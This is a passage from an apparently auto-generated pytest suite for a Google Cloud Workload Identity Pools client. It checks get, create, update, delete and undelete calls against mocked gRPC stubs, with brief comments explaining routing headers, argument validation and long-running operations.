assert response.state == workload_identity_pool.WorkloadIdentityPool.State.ACTIVE
assert response.disabled is True
def test_get_workload_identity_pool_from_dict():
test_get_workload_identity_pool(request_type=dict)
def test_get_workload_identity_pool_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_workload_identity_pool),
'__call__') as call:
client.get_workload_identity_pool()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.GetWorkloadIdentityPoolRequest()
@pytest.mark.asyncio
async def test_get_workload_identity_pool_async(transport: str = 'grpc_asyncio', request_type=workload_identity_pool.GetWorkloadIdentityPoolRequest):
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_workload_identity_pool),
'__call__') as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(workload_identity_pool.WorkloadIdentityPool(
name='name_value',
display_name='display_name_value',
description='description_value',
state=workload_identity_pool.WorkloadIdentityPool.State.ACTIVE,
disabled=True,
))
response = await client.get_workload_identity_pool(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.GetWorkloadIdentityPoolRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, workload_identity_pool.WorkloadIdentityPool)
assert response.name == 'name_value'
assert response.display_name == 'display_name_value'
assert response.description == 'description_value'
assert response.state == workload_identity_pool.WorkloadIdentityPool.State.ACTIVE
assert response.disabled is True
@pytest.mark.asyncio
async def test_get_workload_identity_pool_async_from_dict():
await test_get_workload_identity_pool_async(request_type=dict)
def test_get_workload_identity_pool_field_headers():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workload_identity_pool.GetWorkloadIdentityPoolRequest()
request.name = 'name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_workload_identity_pool),
'__call__') as call:
call.return_value = workload_identity_pool.WorkloadIdentityPool()
client.get_workload_identity_pool(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'name=name/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_get_workload_identity_pool_field_headers_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workload_identity_pool.GetWorkloadIdentityPoolRequest()
request.name = 'name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_workload_identity_pool),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(workload_identity_pool.WorkloadIdentityPool())
await client.get_workload_identity_pool(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'name=name/value',
) in kw['metadata']
def test_get_workload_identity_pool_flattened():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_workload_identity_pool),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = workload_identity_pool.WorkloadIdentityPool()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.get_workload_identity_pool(
name='name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].name == 'name_value'
def test_get_workload_identity_pool_flattened_error():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get_workload_identity_pool(
workload_identity_pool.GetWorkloadIdentityPoolRequest(),
name='name_value',
)
@pytest.mark.asyncio
async def test_get_workload_identity_pool_flattened_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_workload_identity_pool),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = workload_identity_pool.WorkloadIdentityPool()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(workload_identity_pool.WorkloadIdentityPool())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.get_workload_identity_pool(
name='name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].name == 'name_value'
@pytest.mark.asyncio
async def test_get_workload_identity_pool_flattened_error_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.get_workload_identity_pool(
workload_identity_pool.GetWorkloadIdentityPoolRequest(),
name='name_value',
)
def test_create_workload_identity_pool(transport: str = 'grpc', request_type=gi_workload_identity_pool.CreateWorkloadIdentityPoolRequest):
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_workload_identity_pool),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/spam')
response = client.create_workload_identity_pool(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == gi_workload_identity_pool.CreateWorkloadIdentityPoolRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
def test_create_workload_identity_pool_from_dict():
test_create_workload_identity_pool(request_type=dict)
def test_create_workload_identity_pool_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_workload_identity_pool),
'__call__') as call:
client.create_workload_identity_pool()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == gi_workload_identity_pool.CreateWorkloadIdentityPoolRequest()
@pytest.mark.asyncio
async def test_create_workload_identity_pool_async(transport: str = 'grpc_asyncio', request_type=gi_workload_identity_pool.CreateWorkloadIdentityPoolRequest):
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_workload_identity_pool),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name='operations/spam')
)
response = await client.create_workload_identity_pool(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == gi_workload_identity_pool.CreateWorkloadIdentityPoolRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_create_workload_identity_pool_async_from_dict():
await test_create_workload_identity_pool_async(request_type=dict)
def test_create_workload_identity_pool_field_headers():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = gi_workload_identity_pool.CreateWorkloadIdentityPoolRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_workload_identity_pool),
'__call__') as call:
call.return_value = operations_pb2.Operation(name='operations/op')
client.create_workload_identity_pool(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_create_workload_identity_pool_field_headers_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = gi_workload_identity_pool.CreateWorkloadIdentityPoolRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_workload_identity_pool),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(operations_pb2.Operation(name='operations/op'))
await client.create_workload_identity_pool(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
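# The metadata pair asserted above comes from
# gapic_v1.routing_header.to_grpc_metadata, which is roughly equivalent to
# the following sketch (approximate; slashes are deliberately not escaped):
#
#     from urllib.parse import urlencode
#     def to_grpc_metadata(params):
#         return ('x-goog-request-params', urlencode(params, safe='/'))
#
#     # to_grpc_metadata([('parent', 'parent/value')])
#     # -> ('x-goog-request-params', 'parent=parent/value')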
def test_create_workload_identity_pool_flattened():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_workload_identity_pool),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/op')
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.create_workload_identity_pool(
parent='parent_value',
workload_identity_pool=gi_workload_identity_pool.WorkloadIdentityPool(name='name_value'),
workload_identity_pool_id='workload_identity_pool_id_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].parent == 'parent_value'
assert args[0].workload_identity_pool == gi_workload_identity_pool.WorkloadIdentityPool(name='name_value')
assert args[0].workload_identity_pool_id == 'workload_identity_pool_id_value'
def test_create_workload_identity_pool_flattened_error():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.create_workload_identity_pool(
gi_workload_identity_pool.CreateWorkloadIdentityPoolRequest(),
parent='parent_value',
workload_identity_pool=gi_workload_identity_pool.WorkloadIdentityPool(name='name_value'),
workload_identity_pool_id='workload_identity_pool_id_value',
)
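# The ValueError asserted here is raised by a guard the generated client puts
# in front of every method that accepts flattened fields; its shape is
# roughly:
#
#     has_flattened_params = any([parent, workload_identity_pool,
#                                 workload_identity_pool_id])
#     if request is not None and has_flattened_params:
#         raise ValueError('If the `request` argument is set, then none of '
#                          'the individual field arguments should be set.')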
@pytest.mark.asyncio
async def test_create_workload_identity_pool_flattened_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_workload_identity_pool),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name='operations/spam')
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.create_workload_identity_pool(
parent='parent_value',
workload_identity_pool=gi_workload_identity_pool.WorkloadIdentityPool(name='name_value'),
workload_identity_pool_id='workload_identity_pool_id_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].parent == 'parent_value'
assert args[0].workload_identity_pool == gi_workload_identity_pool.WorkloadIdentityPool(name='name_value')
assert args[0].workload_identity_pool_id == 'workload_identity_pool_id_value'
@pytest.mark.asyncio
async def test_create_workload_identity_pool_flattened_error_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.create_workload_identity_pool(
gi_workload_identity_pool.CreateWorkloadIdentityPoolRequest(),
parent='parent_value',
workload_identity_pool=gi_workload_identity_pool.WorkloadIdentityPool(name='name_value'),
workload_identity_pool_id='workload_identity_pool_id_value',
)
def test_update_workload_identity_pool(transport: str = 'grpc', request_type=gi_workload_identity_pool.UpdateWorkloadIdentityPoolRequest):
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_workload_identity_pool),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/spam')
response = client.update_workload_identity_pool(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == gi_workload_identity_pool.UpdateWorkloadIdentityPoolRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
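# Outside of tests, the future.Future asserted above is a long-running
# operation handle. Illustrative (non-test) usage, assuming real credentials
# and a populated request:
#
#     operation = client.update_workload_identity_pool(request=request)
#     pool = operation.result(timeout=300)  # blocks until the LRO completes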
def test_update_workload_identity_pool_from_dict():
test_update_workload_identity_pool(request_type=dict)
def test_update_workload_identity_pool_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_workload_identity_pool),
'__call__') as call:
client.update_workload_identity_pool()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == gi_workload_identity_pool.UpdateWorkloadIdentityPoolRequest()
@pytest.mark.asyncio
async def test_update_workload_identity_pool_async(transport: str = 'grpc_asyncio', request_type=gi_workload_identity_pool.UpdateWorkloadIdentityPoolRequest):
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_workload_identity_pool),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name='operations/spam')
)
response = await client.update_workload_identity_pool(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == gi_workload_identity_pool.UpdateWorkloadIdentityPoolRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_update_workload_identity_pool_async_from_dict():
await test_update_workload_identity_pool_async(request_type=dict)
def test_update_workload_identity_pool_field_headers():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = gi_workload_identity_pool.UpdateWorkloadIdentityPoolRequest()
request.workload_identity_pool.name = 'workload_identity_pool.name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_workload_identity_pool),
'__call__') as call:
call.return_value = operations_pb2.Operation(name='operations/op')
client.update_workload_identity_pool(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'workload_identity_pool.name=workload_identity_pool.name/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_update_workload_identity_pool_field_headers_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = gi_workload_identity_pool.UpdateWorkloadIdentityPoolRequest()
request.workload_identity_pool.name = 'workload_identity_pool.name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_workload_identity_pool),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(operations_pb2.Operation(name='operations/op'))
await client.update_workload_identity_pool(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'workload_identity_pool.name=workload_identity_pool.name/value',
) in kw['metadata']
def test_update_workload_identity_pool_flattened():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_workload_identity_pool),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/op')
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.update_workload_identity_pool(
workload_identity_pool=gi_workload_identity_pool.WorkloadIdentityPool(name='name_value'),
update_mask=field_mask_pb2.FieldMask(paths=['paths_value']),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].workload_identity_pool == gi_workload_identity_pool.WorkloadIdentityPool(name='name_value')
assert args[0].update_mask == field_mask_pb2.FieldMask(paths=['paths_value'])
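# update_mask follows protobuf FieldMask semantics: only the listed paths are
# written on the server. An illustrative mask for a partial update (paths
# assumed for the sketch):
#
#     mask = field_mask_pb2.FieldMask(paths=['display_name', 'description'])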
def test_update_workload_identity_pool_flattened_error():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.update_workload_identity_pool(
gi_workload_identity_pool.UpdateWorkloadIdentityPoolRequest(),
workload_identity_pool=gi_workload_identity_pool.WorkloadIdentityPool(name='name_value'),
update_mask=field_mask_pb2.FieldMask(paths=['paths_value']),
)
@pytest.mark.asyncio
async def test_update_workload_identity_pool_flattened_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_workload_identity_pool),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name='operations/spam')
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.update_workload_identity_pool(
workload_identity_pool=gi_workload_identity_pool.WorkloadIdentityPool(name='name_value'),
update_mask=field_mask_pb2.FieldMask(paths=['paths_value']),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].workload_identity_pool == gi_workload_identity_pool.WorkloadIdentityPool(name='name_value')
assert args[0].update_mask == field_mask_pb2.FieldMask(paths=['paths_value'])
@pytest.mark.asyncio
async def test_update_workload_identity_pool_flattened_error_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.update_workload_identity_pool(
gi_workload_identity_pool.UpdateWorkloadIdentityPoolRequest(),
workload_identity_pool=gi_workload_identity_pool.WorkloadIdentityPool(name='name_value'),
update_mask=field_mask_pb2.FieldMask(paths=['paths_value']),
)
def test_delete_workload_identity_pool(transport: str = 'grpc', request_type=workload_identity_pool.DeleteWorkloadIdentityPoolRequest):
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_workload_identity_pool),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/spam')
response = client.delete_workload_identity_pool(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.DeleteWorkloadIdentityPoolRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
def test_delete_workload_identity_pool_from_dict():
test_delete_workload_identity_pool(request_type=dict)
def test_delete_workload_identity_pool_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_workload_identity_pool),
'__call__') as call:
client.delete_workload_identity_pool()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.DeleteWorkloadIdentityPoolRequest()
@pytest.mark.asyncio
async def test_delete_workload_identity_pool_async(transport: str = 'grpc_asyncio', request_type=workload_identity_pool.DeleteWorkloadIdentityPoolRequest):
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_workload_identity_pool),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name='operations/spam')
)
response = await client.delete_workload_identity_pool(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.DeleteWorkloadIdentityPoolRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_delete_workload_identity_pool_async_from_dict():
await test_delete_workload_identity_pool_async(request_type=dict)
def test_delete_workload_identity_pool_field_headers():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workload_identity_pool.DeleteWorkloadIdentityPoolRequest()
request.name = 'name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_workload_identity_pool),
'__call__') as call:
call.return_value = operations_pb2.Operation(name='operations/op')
client.delete_workload_identity_pool(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'name=name/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_delete_workload_identity_pool_field_headers_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workload_identity_pool.DeleteWorkloadIdentityPoolRequest()
request.name = 'name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_workload_identity_pool),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(operations_pb2.Operation(name='operations/op'))
await client.delete_workload_identity_pool(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'name=name/value',
) in kw['metadata']
def test_delete_workload_identity_pool_flattened():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_workload_identity_pool),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/op')
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.delete_workload_identity_pool(
name='name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].name == 'name_value'
def test_delete_workload_identity_pool_flattened_error():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.delete_workload_identity_pool(
workload_identity_pool.DeleteWorkloadIdentityPoolRequest(),
name='name_value',
)
@pytest.mark.asyncio
async def test_delete_workload_identity_pool_flattened_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_workload_identity_pool),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name='operations/spam')
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.delete_workload_identity_pool(
name='name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].name == 'name_value'
@pytest.mark.asyncio
async def test_delete_workload_identity_pool_flattened_error_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.delete_workload_identity_pool(
workload_identity_pool.DeleteWorkloadIdentityPoolRequest(),
name='name_value',
)
def test_undelete_workload_identity_pool(transport: str = 'grpc', request_type=workload_identity_pool.UndeleteWorkloadIdentityPoolRequest):
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.undelete_workload_identity_pool),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/spam')
response = client.undelete_workload_identity_pool(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.UndeleteWorkloadIdentityPoolRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
def test_undelete_workload_identity_pool_from_dict():
test_undelete_workload_identity_pool(request_type=dict)
def test_undelete_workload_identity_pool_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.undelete_workload_identity_pool),
'__call__') as call:
client.undelete_workload_identity_pool()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.UndeleteWorkloadIdentityPoolRequest()
@pytest.mark.asyncio
async def test_undelete_workload_identity_pool_async(transport: str = 'grpc_asyncio', request_type=workload_identity_pool.UndeleteWorkloadIdentityPoolRequest):
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.undelete_workload_identity_pool),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name='operations/spam')
)
response = await client.undelete_workload_identity_pool(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.UndeleteWorkloadIdentityPoolRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_undelete_workload_identity_pool_async_from_dict():
await test_undelete_workload_identity_pool_async(request_type=dict)
def test_undelete_workload_identity_pool_field_headers():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workload_identity_pool.UndeleteWorkloadIdentityPoolRequest()
request.name = 'name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.undelete_workload_identity_pool),
'__call__') as call:
call.return_value = operations_pb2.Operation(name='operations/op')
client.undelete_workload_identity_pool(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
